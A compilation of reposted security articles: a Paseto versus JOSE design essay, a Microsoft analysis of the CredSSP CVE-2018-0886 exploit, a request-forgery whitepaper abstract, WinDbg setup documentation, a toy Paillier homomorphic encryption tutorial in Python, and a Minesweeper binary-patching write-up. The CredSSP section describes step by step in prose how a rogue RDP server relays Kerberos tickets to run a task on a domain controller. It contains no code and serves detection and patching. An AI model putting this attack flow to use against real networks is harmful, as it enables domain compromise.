A far more robust design is to use versioned protocols—for which each version has One True Ciphersuite—with a small backward compatibility window. That is what we did with Paseto, and that's why tokens have a header that includes protocol version information. Should Paseto need a version 3 (e.g. if a practical quantum computer is developed and RSA and ECC are both doomed), we can specify a simply-secure ciphersuite for the new version that uses post-quantum cryptography algorithms. In such a scenario, local tokens can be decrypted and re-encrypted transparently (although quantum computers don't threaten AES-256), and public tokens older than v3 can simply be rejected. No downgrade attacks. No weird configurations. No "alg":"none" gotchas to watch out for. The Next Steps I tagged, signed, and released v0.5.0 of the Paseto specification and reference implementation this morning. The specification has not changed since version 0.4, and is unlikely to change again. In the coming weeks, I intend to write a draft RFC and submit it to the IETF as a secure-by-default replacement for the JOSE standards. There is talk among some security experts of launching a Web Token Competition for an "official" JOSE replacement, in the spirit of the Password Hashing Competition that gave us Argon2. Should such a competition surface in the near future, Paseto will be my entry in the contest. However, minor documentation and political concerns aside, Paseto should be considered stable enough to be used in production systems. If you're considering building JWT support into your next software project, consider supporting Paseto instead. It's time to retire error-prone cryptographic standards everywhere. Are Versioned Protocols Really More Robust than Ciphersuite Agility? Yes, and if you don't work with cryptography, the reason why might not be immediately obvious. Modern ciphers aren't directly broken in the real world, most of the time. 
Most cryptographic protocol vulnerabilities are found in the joinery between components. So instead of hoping for a cryptanalytic breakthrough, security researchers simply attack the mortar instead of the bricks. A good example: although AES is a secure block cipher, using it in ECB mode is not secure, and using AES in CBC mode (without adding ciphertext integrity) allows trivial plaintext recovery through a type of online attack called a padding oracle attack. These attacks don't break AES, but the protocols that use AES in this way are broken.

Circling back to the brick wall analogy: let's pretend you were building an actual brick wall, but instead of deciding on the bricks and then adhering them in place with mortar, you simply constructed a hollow wireframe of mortar so that bricks could be hot-swapped in case a new tenant decided they wanted a wall made of papier-mâché bricks instead of stone bricks. Would you trust that wall to hold up a roof? Cryptographic protocol design isn't too dissimilar from brick walls.

How does this relate to JOSE and Paseto? Looking back at the JOSE standards, particularly JSON Web Encryption, you'll learn that you're allowed to encrypt a key with one of four methods:

  RSA with PKCS #1 v1.5 padding (asymmetric cryptography, insecure)
  RSA with OAEP padding (asymmetric cryptography)
  ECDH (asymmetric cryptography)
  AES-GCM (symmetric cryptography)

(One of these things is not like the others.)

By giving users and implementors enough rope to hang themselves, ciphersuite agility balloons the complexity of the protocol and increases the attack surface, with little recourse if all the available options turn out to be horrendously broken. It also increases the chances of getting the configuration wrong in a way that dooms the security of a system.

What Do Versioned Protocols Do Differently?

The difference is subtle, but important.
Ciphersuite agility means essentially building a hollow wireframe or honeycomb structure and allowing implementors to fill in the blanks with options they find palatable. This is one of the core design mistakes of SSL/TLS that system administrators have fumed about for decades. (TLS 1.0: "You want to deploy RC4 with SHA1? OK, you're the boss.") With ciphersuite agility, the security of a deployment is nontrivial ("Okay, it's using version 1.2, but which ciphersuites are supported?"), and backward compatibility is complicated ("Which ciphersuites are allowed in version 1.2 but not allowed in version 1.3?"). These two facts lead to a heightened risk of implementations and/or deployments ending up vulnerable to downgrade attacks (e.g. DROWN).

Versioned protocols mean hard-coding one specific ciphersuite to any given version of the protocol. If the hard-coded ciphersuite for a version of the current protocol is found to be insecure, a new version should be decided upon and released. With versioned protocols, the security of a deployment is straightforward ("Oh, it's using version 2? No further questions.") and backward compatibility is simple ("We only allow v2 and v3; all others are blocked."). The risk of downgrade attacks isn't quite zero, but there is no unnecessary complexity to exacerbate the odds of one happening.

If you have versioned protocols, where the algorithm choice was sourced from security experts well-versed in cryptography, you end up in a much better place than with mix-and-match cryptography construction.

Sursa: https://paragonie.com/blog/2018/03/paseto-platform-agnostic-security-tokens-is-secure-alternative-jose-standards-jwt-etc
-
Azure Advanced Threat Protection: CredSSP Exploit Analysis
April 18, 2018
Azure Advanced Threat Protection Team

This post is authored by Tal Maor, Security Researcher, Azure ATP.

After announcing the release of Azure Advanced Threat Protection (Azure ATP) just a few weeks ago, we are excited to provide details on how Azure ATP has been updated to better protect customers against a new exploit, by including the identity theft technique used in the Credential Security Support Provider (CredSSP) Protocol exploit as a flavor of the Pass-The-Ticket detection.

In March, Microsoft released a patch for CVE-2018-0886, which protects against a vulnerability discovered by Preempt. The vulnerability allows attackers to perform authenticated remote code execution by taking advantage of the way CredSSP validates requests during the authentication process. In this blog, we provide a network behavior analysis of the exploitation of this vulnerability and the techniques it uses to propagate in the network. Additionally, we highlight how you can use Azure ATP to detect and investigate a variety of advanced cyberattack attempts.

CredSSP exploitation analysis

CredSSP enables an application to securely delegate a user's credentials from a client to a target server; any application that depends on CredSSP for authentication may be vulnerable to this type of attack. The CredSSP remote code execution vulnerability is also known as a Kerberos relay attack using CredSSP, because it uses Kerberos to authenticate against the target and to sign the malicious payload. As an example of how an attacker would exploit this vulnerability against the Remote Desktop Protocol, the attacker would need to run a specially crafted application and perform a man-in-the-middle attack against a Remote Desktop Protocol session.

Main steps of standard CredSSP's Kerberos U2U

1. SSL negotiation – the RDP server returns its public certificate.
2. The client requests a TGS from the Ticket Granting Service for TERMSRV on the RDP server – this TGS won't be used, although it is retrieved.
3. The client requests the Ticket Granting Ticket (TGT) which should be used as an additional ticket for granting a TGS to the RDP server – this step is unique to the U2U mechanism.
4. The client asks the Key Distribution Center (KDC) for a U2U TGS for the RDP server, using the RDP client TGT from its initial AS request and the additional TGT of the RDP server (retrieved in step 3).
5. a. The KDC first validates the authenticity of the requester using the RDP client TGT. Then it opens the RDP server TGT with the krbtgt long-term key and uses the TGT session key to encrypt the requested TGS.
   b. The client receives the U2U TGS encrypted with the RDP server TGT session key, and the TGS enc-part response encrypted with the RDP client TGT session key; both encrypted parts contain a new session key generated by the KDC for the new RDP connection.
   c. The client opens the TGS enc-part response and finds the session key shared with the RDP server.
6. The client creates an AP request using the received TGS for the RDP connection and the relevant session key (both retrieved in step c). This AP request also contains the RDP server public key (received in the SSL negotiation), encrypted with the negotiated session key, as the "Channel Binding" of CredSSP to validate client authenticity.

At this point, the authentication phase is over and the encrypted RDP session is established.

Main steps of the malicious CredSSP's Kerberos U2U

In this flow, the target is the Domain Controller, which also runs RDP and RPC servers by default.

0. Setting up the malicious RDP server: RPC-bind to the TaskSchedulerService interface with a U2U Kerberos KERB-TGT-REQUEST. This retrieves the relevant TGT for the TERMSRV\dc1.domain1.test.local service.
1. Wait for the victim to connect via RDP.
2. The RDP client initiates a secured TLS connection with the malicious RDP server and requests its public certificate. This time the malicious RDP server returns a malicious public certificate in clear text. The client uses the public key from the certificate to initiate an encrypted SSL connection, and later signs the public key using the Kerberos session key (aka "Channel Binding") as part of the last step of CredSSP, in the Kerberos AP request.
3. The client requests a TGS for TERMSRV on the malicious RDP server – this TGS won't be used, although it is retrieved.
4. The client requests the TGT which should be used as an additional ticket for granting a TGS to the malicious RDP server – this step is unique to the U2U mechanism.
5. The client asks the KDC for a U2U TGS (using the RDP client TGT from its normal AS request) and the additional TGT of the RDP server (retrieved in step 3).
6. The client creates an AP request, which includes the TGS for the RDP connection. This AP request also contains the malicious RDP server public key, encrypted with the negotiated session key; it was meant to be the Channel Binding, and it is used by the malicious RDP server in the next steps. The malicious RDP server tries to authenticate the RPC session (initiated in step 0) by performing an AP request with the TGS and authenticator extracted from the original AP request of the victim. The DC gets this AP request as part of the RPC session and validates the received TGS and authenticator.
7. The malicious server sends the signed task scheduler request – which was sent to the victim as a public key (in step 0) and returned signed by the victim (in step 6) – over the authenticated RPC session, successfully creating a malicious task.
Given that the Kerberos AP request from the attacker using the original clients TGS, Azure ATP will detect this malicious behavior and will create the following security alert: In addition, Azure ATP detects several Remote Code Execution techniques performed against the Domain Controller. Given that the RPC makes a call to create a task scheduler on the domain controller, the following security alert is created: When the two security alerts started concurrently and point to the same machine, this can point to the conclusion that this machine performed a remote malicious operation by using the theft identity like as the operation performed by the CredSSP exploit. We strongly recommend that customers who have not yet set the security update for CredSSP to do so as soon as possible. For more information on how to apply the patch please visit CredSSP updates for CVE-2018-0886. You can learn more about Azure ATP here, and when you are ready, start a trial! Additional Resources CredSSP updates for CVE-2018-0886 From Public Key to Exploitation: How We Exploited the Authentication in MS-RDP Security Advisory: Critical Vulnerability in CredSSP Allows Remote Code Execution on Servers Through MS-RDP (Video) CVE-2018-0886 | CredSSP Remote Code Execution Vulnerability How Kerberos user-to-user authentication works? Sursa: https://cloudblogs.microsoft.com/enterprisemobility/2018/04/18/azure-advanced-threat-protection-credssp-exploit-analysis/?_lrsc=5d41d863-5550-4519-99c6-495d29b52e92
-
Cross-Protocol Request Forgery

Server-Side Request Forgery (SSRF) and Cross-Site Request Forgery (CSRF) are two attack methods that enable attackers to cross network boundaries in order to attack applications, but they can only target applications that speak HTTP. Custom TCP protocols are everywhere: IoT devices, smartphones, databases, development software, internal web applications, and more. Often, these applications assume that no security is necessary because they are only accessible over the local network. This paper aims to be a definitive overview of attacks that allow cross-protocol exploitation of non-HTTP listeners using CSRF and SSRF, and it also expands the state of the art in these types of attacks to target length-specified protocols that were not previously thought to be exploitable.

Download: https://www.nccgroup.trust/globalassets/our-research/us/whitepapers/2018/cprf-1.pdf
Published date: 10 April 2018

Sursa: https://www.nccgroup.trust/us/our-research/cross-protocol-request-forgery/?research=Whitepapers
-
-
-
-
Getting Started with Windows Debugging
11/28/2017

This section covers how to get started with Windows Debugging. If your goal is to use the debugger to analyze a crash dump, see Crash dump analysis using the Windows debuggers (WinDbg). To get started with Windows Debugging, complete the following tasks.

Determine which devices will serve as the host system and the target system.

The debugger runs on the host system, and the code that you want to debug runs on the target system.

Host <--------------------------------------------------> Target

Because it is common to stop instruction execution on the processor during debugging, two systems are typically used. In some situations, the second system can be a virtual system, for example, a virtual PC that is running on the same PC. However, if your code communicates with low-level hardware, using a virtual PC may not be the best approach. For more information, see Setting Up Network Debugging of a Virtual Machine Host.

Determine whether you will be doing kernel-mode or user-mode debugging.

Kernel mode - Kernel mode is the processor access mode in which the operating system and privileged programs run. Kernel-mode code has permission to access any part of the system, and it is not restricted like user-mode code. It can gain access to any part of any other process running in either user mode or kernel mode. Much of the core OS functionality and many hardware device drivers run in kernel mode.

User mode - Applications and subsystems run on the computer in user mode. Processes that run in user mode do so within their own virtual address spaces. They are restricted from gaining direct access to many parts of the system, including system hardware, memory that was not allocated for their use, and other portions of the system that might compromise system integrity.
Because processes that run in user mode are effectively isolated from the system and from other user-mode processes, they cannot interfere with these resources.

If your goal is to debug a driver, determine whether the driver is a kernel-mode driver (typically described as a WDM or KMDF driver) or a user-mode driver (UMDF). For some issues, it can be difficult to determine which mode the code is executing in. In that case, you may need to pick one mode and see what information is available in that mode. Some issues require using the debugger in both user and kernel mode. Depending on which mode you decide to debug in, you will need to configure and use the debuggers in different ways. Some debug commands operate the same in both modes, and some operate differently.

For information about using the debugger in kernel mode, see Getting Started with WinDbg (Kernel-Mode), Debug Universal Drivers - Step by Step Lab (Echo Kernel-Mode), and Debug Drivers - Step by Step Lab (Sysvad Kernel-Mode). For information about using the debugger in user mode, see Getting Started with WinDbg (User-Mode).

Choose your debugger environment.

WinDbg works well in most situations, but there are times when you may want to use another debugger, such as console debuggers for automation, or even Visual Studio. For more information, see Debugging Environments.

Determine how you will connect the target and host system.

Typically, an Ethernet network connection is used to connect the target and host system. If you are doing early bring-up work, or don't have an Ethernet connection on the device, other network connection options are available. For more information, see these topics:

Setting Up Kernel-Mode Debugging Manually
Setting Up Kernel-Mode Debugging over a Network Cable Manually
Setting Up Kernel-Mode Debugging using Serial over USB Manually
Setting Up Network Debugging of a Virtual Machine Host

If you wish to debug using Visual Studio, then refer to these topics.
Setting Up Kernel-Mode Debugging in Visual Studio
Setting Up Kernel-Mode Debugging over a Network Cable in Visual Studio
Setting Up Kernel-Mode Debugging using Serial over USB in Visual Studio
Setting Up Kernel-Mode Debugging of a Virtual Machine in Visual Studio
Setting Up User-Mode Debugging in Visual Studio

Choose either the 32-bit or 64-bit debugging tools.

This choice depends on the version of Windows that is running on the target and host systems and on whether you are debugging 32-bit or 64-bit code. For more information, see Choosing the 32-Bit or 64-Bit Debugging Tools.

Configure symbols.

You must load the proper symbols to use all of the advanced functionality that WinDbg provides. If you do not have symbols properly configured, you will receive messages indicating that symbols are not available when you attempt to use functionality that depends on them. For more information, see Symbols for Windows debugging (WinDbg, KD, CDB, NTSD).

Configure source code.

If your goal is to debug your own source code, you will need to configure a path to it. For more information, see Source Path.

Become familiar with debugger operation.

The Debugger Operation section of the documentation describes debugger operation for various tasks. For example, the Loading Debugger Extension DLLs topic explains how to load debugger extensions. To learn more about working with WinDbg, see Debugging Using WinDbg.
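As a concrete illustration of the symbol-configuration step above, the symbol path is usually set through the _NT_SYMBOL_PATH environment variable; this sketch assumes a hypothetical local cache directory C:\MySymbols in front of the Microsoft public symbol server:

```shell
rem Hypothetical example: cache symbols locally in C:\MySymbols and fall
rem back to the Microsoft public symbol server for anything missing.
setx _NT_SYMBOL_PATH "srv*C:\MySymbols*https://msdl.microsoft.com/download/symbols"
```

The same value can also be set for the current session from inside the debugger with the .sympath command.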
Use the .hh (Open HTML Help File) command in the debugger to display help information about any debug command. For more information about the available commands, see Debugger Reference.

Use debugging extensions for specific technologies.

There are a number of debugging extensions that provide parsing of domain-specific data structures. For more information, see Specialized Extensions.

This section contains the following topics:

Getting Started with WinDbg (Kernel-Mode)
Getting Started with WinDbg (User-Mode)
Choosing the 32-Bit or 64-Bit Debugging Tools
Debugging Environments
Setting Up Debugging (Kernel-Mode and User-Mode)
Debug Universal Drivers - Step by Step Lab (Echo Kernel-Mode)
Debug Drivers - Step by Step Lab (Sysvad Kernel-Mode)

Sursa: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/getting-started-with-windows-debugging?WT.mc_id=linkedin
-
April 13, 2018

Crypto Journal Part II: Homomorphic Encryption

Starting Words

This post covers homomorphic encryption from an introductory perspective and then shows examples of two schemes. The math is kept to a minimum, but some terms that are used a lot need to be explained first; every paper is referenced at the end of the post. A later blog post will look at other schemes and discuss the idea of bootstrapping circuits.

Group: a group in mathematics is the most basic algebraic structure; it's simply a set (a bunch of numbers) together with an operation (addition, multiplication...) that satisfies certain axioms.

Modulo: the operation that, in programming languages, yields the remainder of integer division.

Cyclic group: a group that can be generated from a single element, called the generator; imagine the group of powers of 2, {2^k}: that's a cyclic group whose generator is 2.

Congruence: a = b (mod n) reads "a is congruent to b modulo n" and simply means that a - b is a multiple of n.

Finite group: a group with a limited set (a fixed number of elements).

Integers modulo n: the most used type of group in cryptography; it contains the numbers {0, 1, 2, ..., n-1} and all operations are modular.

Modular arithmetic: we speak of modular operations, for example modular addition, when we do addition in an integers-modulo-n group; a clock, for example, uses modulo-12 addition.

Modular multiplicative inverse: a modular multiplicative inverse of a number x is another number y such that xy = 1 mod n (the product xy is congruent to 1 modulo n); in simpler terms, xy - 1 can be evenly divided by n.

Order of a group: the number of elements in its set.

We won't need much math to get the ideas and work through some examples, but having a notion of what these terms mean will help in the long term. I recommend two books if you want to dive deeper into the mathematics.
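The last two definitions are easy to play with in Python, a quick sketch (the modular inverse uses the three-argument pow with exponent -1, available from Python 3.8):

```python
# Integers modulo n: all arithmetic wraps around n, like hours on a clock.
n = 143                              # 11 * 13, the modulus used later in this post
assert (100 + 50) % n == 7           # modular addition

# Modular multiplicative inverse: the y with 120*y = 1 (mod 143).
y = pow(120, -1, n)                  # Python 3.8+
assert (120 * y) % n == 1            # so xy - 1 is evenly divisible by n
```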
Introduction

Homomorphic encryption is based on the idea of homomorphisms in group theory. Put simply, a homomorphism is a function that maps one group to another such that:

f(a.b) = f(a).f(b)    (1)

(consider the dot to be an operation, addition or multiplication for example). Homomorphic encryption is thus a structure/operation-preserving encryption/mapping. Its use cases span different areas, for example electronic voting, machine learning, anonymous location queries, search engines, cloud computing... The word "homomorphism" is built from the Greek homos, which means "same", and morphe, which stands for "shape".

Homomorphic Encryption

Encryption is the science or art of transforming plaintext messages into a hidden, "encrypted" form. Homomorphic encryption is a form of encryption for which the formula stated above holds; in other words, the "f" is an encryption algorithm, and the encryption of the product of two numbers is equal to the product of the encryptions of the numbers:

E(a.b) = E(a).E(b)

where E is an encryption algorithm or, in more formal terms, a scheme. As with any kind of encryption, we can describe two ways of doing it: secret-key encryption or public-key encryption. The first uses one key to both encrypt and decrypt a message; the second uses a public key to encrypt and a private key to decrypt. Mathematically speaking they are both theoretically secure; alas, in the real world it's hard to get it right, and a scheme such as RSA can be easily broken if it's not padded. RSA is actually the first public-key homomorphic encryption scheme, but to achieve semantic security RSA needs to pad a message with random bits before encryption. The padding results in RSA losing its homomorphic property, so if you hear the words "RSA and homomorphic encryption", we are talking about unpadded RSA.
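A tiny demonstration of that multiplicative property with unpadded ("textbook") RSA, using toy-sized and deliberately insecure parameters:

```python
# Textbook RSA: E(m) = m^e mod n. Because (a*b)^e = a^e * b^e (mod n),
# the encryption of a product equals the product of the encryptions --
# exactly property (1), with the dot as modular multiplication.
p, q = 11, 13
n = p * q            # 143
e = 7                # public exponent, coprime to (p-1)*(q-1) = 120

def E(m):
    return pow(m, e, n)

a, b = 6, 9
assert E(a * b % n) == E(a) * E(b) % n   # the homomorphic property holds
```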
An encryption algorithm is called homomorphic if it satisfies property (1) for some kind of operation. As we are going to see next, some schemes are only homomorphic with respect to addition, some with respect to both addition and multiplication, and the messages are usually numbers. The many existing schemes separate into two families, Somewhat Homomorphic and Fully Homomorphic:

Somewhat Homomorphic: you are limited in the kinds of operations you can perform between two ciphertexts; for example, you can add two ciphertexts but you can't multiply them, or you can multiply a ciphertext by a plaintext.

Fully Homomorphic: you can evaluate essentially any kind of operation on ciphertexts. The term was coined by Rivest in 1978, but Craig Gentry was the first to introduce a scheme that works on arbitrary functions, in his PhD thesis "Fully Homomorphic Encryption Using Ideal Lattices".

Key point: homomorphic encryption in general is defined by property (1); the dot can represent any operation, as long as the formula holds for that operation, whether addition, multiplication or modular multiplication.

N.B.: many public-key schemes are "probabilistic", meaning that encrypting the same message multiple times yields different ciphertexts; they introduce randomness to hide even the smallest partial information about the plaintext, which is what we call semantically secure.

Examples of Schemes

In this section we introduce a few schemes and show some examples using small parameters and Python. Note that the code here consists of toy examples only; don't use it in real life, because, as you will learn in Cryptopals, it's hard to implement crypto correctly.

Paillier

The Paillier scheme was invented by Pascal Paillier in 1999. It's a probabilistic scheme that is homomorphic with respect to addition (the product of two ciphertexts decrypts to the sum of the two plaintexts) and to multiplication by a constant.
Suppose E is the Paillier encryption function; then we have the following two properties:

E(a) * E(b) = E(a+b)
E(a)^b = E(a*b)

Paillier is composed of three algorithms; in fact, three algorithms are necessary to create any encryption scheme: first a key generation algorithm, second an encryption algorithm, and last a decryption algorithm. Let's see how Paillier implements them.

Key Generation

To generate a key, you choose two large primes p and q such that:

gcd(pq, (p-1)(q-1)) = 1

In other words, pq and (p-1)(q-1) are relatively prime (their greatest common divisor is 1). Then you compute two parameters n and lambda such that:

n = pq and lambda = lcm(p-1, q-1)

(lcm is the least common multiple; for example, lcm(4,8) = 8.)

Select a random integer g from the set of integers modulo n^2; in this case (p and q are primes of the same length) you can pick g = n+1. Compute mu such that mu = lambda^-1 mod n (the modular multiplicative inverse). The public key is (n, g) and the private key is (lambda, mu).

Encryption

Suppose m is your message and r a random number such that m < n and r < n:

c = g^m * r^n mod n^2

c is the ciphertext of m.

Decryption

m = L(c^lambda mod n^2) * mu mod n
where L(x) = (x-1) / n

Example with small parameters and proof of homomorphism

Let p = 11 and q = 13:

n = pq = 143
g = n+1 = 144

The public key is (143, 144). Let's encrypt the answer of the universe and send it to the Zorbs (the inhabitants of the planet Zorbis):

m = 42

We pick r = 23:

c = g^m * r^n (mod n^2) = 144^42 * 23^143 (mod 143^2) = 9637

Decryption:

lambda = (p-1)*(q-1) = 10*12 = 120
mu = lambda^-1 mod n = 120^-1 mod 143
m = L(9637^120 mod 143^2) * (120^-1 mod 143) mod 143
m = 42

Note that you should use the modular inverse to compute mu. (Also note that this example uses lambda = (p-1)(q-1) rather than lcm(p-1, q-1); since it is a multiple of the lcm, decryption still works.)

Homomorphic Properties

Now that we have defined the procedures to generate a keypair, encrypt and decrypt, let's discuss the homomorphic properties of Paillier.
Addition: the product of two ciphertexts decrypts to the sum of their plaintexts. If I want to perform addition on plaintexts through their ciphertexts, I have to calculate the product of the ciphers.

Proof (suppose E is the encryption algorithm and m1 and m2 the plaintexts):

E(m1) * E(m2) = (g^m1 * r1^n)(g^m2 * r2^n) mod n^2
              = g^(m1+m2) * (r1*r2)^n mod n^2
              = E(m1+m2)

Multiplication: if I have a plaintext m and a constant k, then the cipher of m raised to the power k decrypts to their product.

Proof (same suppositions about E, m1, m2 as before):

E(m1)^m2 = (g^m1 * r1^n)^m2 mod n^2
         = g^(m1*m2) * (r1^m2)^n mod n^2
         = E(m1*m2)

Python Example Implementation

The following code reproduces the example we made above, using the same parameters:

# we need the modular inverse operation
def egcd(a, b):
    if a == 0:
        return (b, 0, 1)
    g, y, x = egcd(b % a, a)
    return (g, x - (b // a) * y, y)

def modinv(a, m):
    g, x, y = egcd(a, m)
    if g != 1:
        raise Exception('modular inverse does not exist')
    return x % m

# we also define the L function (note the integer division)
def l(u, n):
    return (u - 1) // n

# pick two primes
p = 11
q = 13
# compute n
n = p * q
# pick g; since p and q are of the same length we can use n + 1
g = n + 1
# compute lambda
lda = (p - 1) * (q - 1)
# compute mu
mu = modinv(lda, n)

# declare a message
m = 42
# pick r such that r < n
r = 23

# compute the ciphertext: c = g^m * r^n mod n^2
c = pow(g, m, n ** 2) * pow(r, n, n ** 2) % n ** 2
print(c)  # 9637

# decrypt the ciphertext
d = l(pow(c, lda, n ** 2), n) * mu % n
print(d)  # 42

# let's make an addition
k = 10
# encrypt k
ck = pow(g, k, n ** 2) * pow(r, n, n ** 2) % n ** 2
# verify that E(m) * E(k) decrypts to m + k
cres = ck * c % n ** 2
# decrypt the result
dres = l(pow(cres, lda, n ** 2), n) * mu % n
print(dres)  # 52

Ending Notes

I don't think I treated every bit of the subject in this blog post, but the aim was to present and explain the ideas as clearly as possible; for a more in-depth treatment you can read the references below.
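One more check on the probabilistic property mentioned earlier: encrypting the same message with fresh randomness yields different ciphertexts that decrypt identically. A self-contained sketch with the same toy parameters (pow with exponent -1 needs Python 3.8+):

```python
# Paillier is probabilistic: same message, different r, different ciphertext.
p, q = 11, 13
n = p * q
g = n + 1
lam = (p - 1) * (q - 1)
mu = pow(lam, -1, n)

def enc(m, r):
    return pow(g, m, n**2) * pow(r, n, n**2) % n**2

def dec(c):
    return (pow(c, lam, n**2) - 1) // n * mu % n

c1, c2 = enc(42, 23), enc(42, 29)   # same message, two random values
assert c1 != c2                      # ciphertexts differ...
assert dec(c1) == dec(c2) == 42      # ...but decrypt to the same plaintext
```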
Other schemes that are partially homomorphic include ElGamal (yes, the same one used by GnuPG), Goldwasser-Micali, and Boneh-Goh-Nissim, which operates on elliptic curves. I would like to thank Andrew Trask for his suggestions and for taking the time to read an early draft.

References

Abstract Algebra: A Book of Abstract Algebra by Charles C. Pinter
Number Theory: Summing It Up by Avner Ash and Robert Gross
Paillier paper: PDF
Gentry 2009, FHE using Ideal Lattices: Link
Goldwasser-Micali: Wiki
Boneh-Goh-Nissim: PDF

Sursa: https://radicalrafi.github.io/posts/homomorphic-encryption/
-
Ophir Harpaz
Apr 13

Put The Flags Out! — Hacking Minesweeper

Background

Two weeks from today, the first Low Level & Security Celebration will take place. This event is organized by Baot, and its goal is to attract more women into the low-level and security fields. I was given the amazing yet terrifying task of teaching the reverse engineering workshop.

When I started planning the workshop's last session, I had no idea what to do. I was looking for an interesting challenge that I could use in my workshop. A dear friend of mine, Aviad Carmel, is a super-skilled reverser and my reverse engineering mentor. He suggested that I hack Minesweeper such that when Minesweeper starts up, all mines are marked with flags.

It took me one week, tens of hours, many Windows API Google searches and way too many breakpoints to finish, but I finally did it. I was so excited I had to tweet something, which proved to be a great thing to do, as I received many likes, comments, retweets and GitHub-link requests. I even got to know a very talented young researcher who (in a strange coincidence) hacked Minesweeper too and published his own post about it!

But that was all intro — let's get to the point. I am about to do two things in this post: show you the hard, long, Sisyphean way I took in order to solve the challenge, and tease you with two follow-up challenges. Let's go.

I Did It My Way

As I just said, my way took forever, or so it felt. I went from IDA to OllyDbg and back to IDA, put breakpoints on every suspicious line, filled my notebook with addresses I later forgot, and basically got lost. A lot. Aviad noticed my frustration and wrote me something on WhatsApp which I then scribbled on a sticky note right below my screen:

The most important thing is to persist, to not give up, to truly believe that there is no chance for the computer to beat you. There is no such thing as "difficult", perhaps just "takes more time".

Aviad's words and a cup of coffee keep me highly motivated.
My strategy went something like this:

1. Find the code that draws a flag upon a right-click (let's call this function draw_flag).
2. Find the code that draws the board (let's call this function draw_board).
3. Change the function draw_board such that whenever a mined square is met, draw_flag is called with the proper parameters.

It was tedious, but eventually I found the line that draws a flag on a square when it is right-clicked. When stepping over this line with an F8, the flag immediately appeared on the board.

The highlighted line is the one that draws a flag on a square. According to MSDN, the function on this line, BitBlt, "performs a bit-block transfer of the color data corresponding to a rectangle of pixels from the specified source device context into a destination device context". HUH?! This was Greek to me, but I guessed that the function copied pixels from a source to a destination, and that the source device context was the argument I cared about.

The value of this hSrcDC argument is fetched from an array located at 1005A20, using an offset which is stored in the EDX register. When drawing a flag, this offset equals 0x0E (see the screenshot above and notice line 1002676 and the EDX register).

My next guess was that this BitBlt function was used not only to draw a flag, but to draw a mine or an empty square as well. I used IDA's xrefs (cross-references) feature to detect where BitBlt is used elsewhere:

I went to the second location in the code where BitBlt was called. To my pleasant surprise, the call appeared in a block which was part of a loop. This strengthened my assumption that the initial board was drawn using this function. This time, the value of hSrcDC was set by accessing the same hdcSrc array with an offset stored in EAX. Examining the value of EAX, I could say that:

EAX = *(EBX + ESI) & 0x1F

0x1F is a literal, but what are EBX and ESI?
Looking at the two blocks before, I saw that EBX was a fixed location in memory (1005360) and ESI was the loop variable. I examined the address 1005360 in memory and found something that looked a lot like a mine-field. I noticed two things:

1. Each pair of 0x10’s is exactly 9 bytes apart, so 0x10 must be a delimiter for rows on the board.
2. There were exactly ten 0x8F’s, which suggested that 0x8F is a value representing mines. This left 0x0F to represent an empty square.

By ANDing with 0x1F on line 10026E9 (see IDA screenshot), both 0x0F and 0x8F end up being 0x0F, but I wanted them to be 0x0E, remember? 😉 This AND instruction was too strict, and it was the key to what I was trying to achieve. I needed to make it more flexible and take into consideration the value of the currently-processed square. The logic I wanted to implement was this:

if board_location[square_position] == 0x8F:
    draw_flag
else:
    draw_empty_square

The existing AND instruction takes 3 bytes of opcode. My logic was way beyond 3 bytes; I needed a code cave to the rescue. I searched the executable file for a slot in the code section with enough null bytes which I could replace with my own code. Using a hex editor and a nice online assembler, I added my opcodes, corresponding to the following x86 instruction sequence:

1004A60  CMP AL, 8F
1004A62  JNZ SHORT patched_minesweeper.01004A66
1004A64  MOV AL, 0E
1004A66  PUSH DWORD PTR DS:[EAX*4+1005A20]
1004A6D  JMP patched_minesweeper.010026F3

Notice how this assembly code implements the pseudo-code from above: AL is compared to 0x8F (a mine value). If it is not a mine, go on with the original code, namely draw an empty square. If it is a mine, replace 0x8F with 0x0E (the value required for drawing a flag). In order to run my new code, I needed to use a JMP instruction from the original code. But even the JMP opcode takes more than 3 bytes, meaning I had to override not only the AND instruction but also the one following it.
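The masking problem and the intended fix can be checked in a few lines of Python (a standalone sketch; the 0x1F mask and the 0x8F/0x0F/0x0E/0x10 byte values come from the text above, while the sample board row is made up for illustration):

```python
# Byte values recovered from Minesweeper's board buffer at 1005360 (per the text):
MINE, EMPTY, BORDER = 0x8F, 0x0F, 0x10
FLAG_TILE = 0x0E  # index into the hdcSrc array that draws a flag

# The original code masks every square with 0x1F before picking a tile, which
# collapses mines and empty squares into the same tile index:
assert MINE & 0x1F == EMPTY & 0x1F == 0x0F

def tile_index_patched(square: int) -> int:
    """Mimics the patched logic: mines select the flag tile instead."""
    if square == MINE:
        return FLAG_TILE
    return square & 0x1F

# A hypothetical one-row board: a border byte, 9 squares, then a border byte.
row = bytes([BORDER, EMPTY, MINE, EMPTY, EMPTY, MINE, EMPTY, EMPTY, EMPTY, EMPTY, BORDER])
tiles = [tile_index_patched(b) for b in row[1:-1]]
print(tiles)  # mines map to 0x0E (flag), empty squares stay 0x0F
```

With the patch in place, 0x8F squares now select tile 0x0E, exactly what the code-cave above does with CMP AL, 8F / MOV AL, 0E.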
I padded the remaining bytes with NOPs and added the overridden instruction to my patch (see line 1004A66 above). So the original code was modified to look like this: 010026E9 JMP patched_minesweeper.01004A60 010026EE NOP 010026EF NOP 010026F0 NOP 010026F1 NOP 010026F2 NOP Minesweeper was now patched to mark mines with flags. The end. You will Do It the Other Way Now the fun part. When I talked to Aviad to share my solution, he told me that I had taken a long and winding road. Apparently, there is a hack which is significantly more elegant and efficient than what I did. If you want to give it a try, please do. Here are 2 hints: It’s a one-liner. Namely, you can change one line only to make the game start with flags on all mined squares. Instead of changing how the mine-field is printed, change the mine-field itself. How would you create it if you were the Minesweeper programmer? One Last Riddle When I opened my patched version of Minesweeper, I wanted to perform a sanity check. I clicked on a flag and expected the game to be over (since flags mark mines). That didn’t happen, and the game was over only after clicking on a second flag. Why? You are more than welcome to contact me for questions, notes, suggestions, etc. Good luck and thanks for reading :) Sursa: https://medium.com/@ophirharpaz/put-the-flags-out-hacking-minesweeper-befff233edc1
-
New ‘Early Bird’ Code Injection Technique Discovered
Hod Gavriel, Boris Erbesfeld | Apr 11, 2018

This injection technique allows the injected code to run before the entry point of the main thread of the process, thereby avoiding detection by anti-malware products’ hooks.

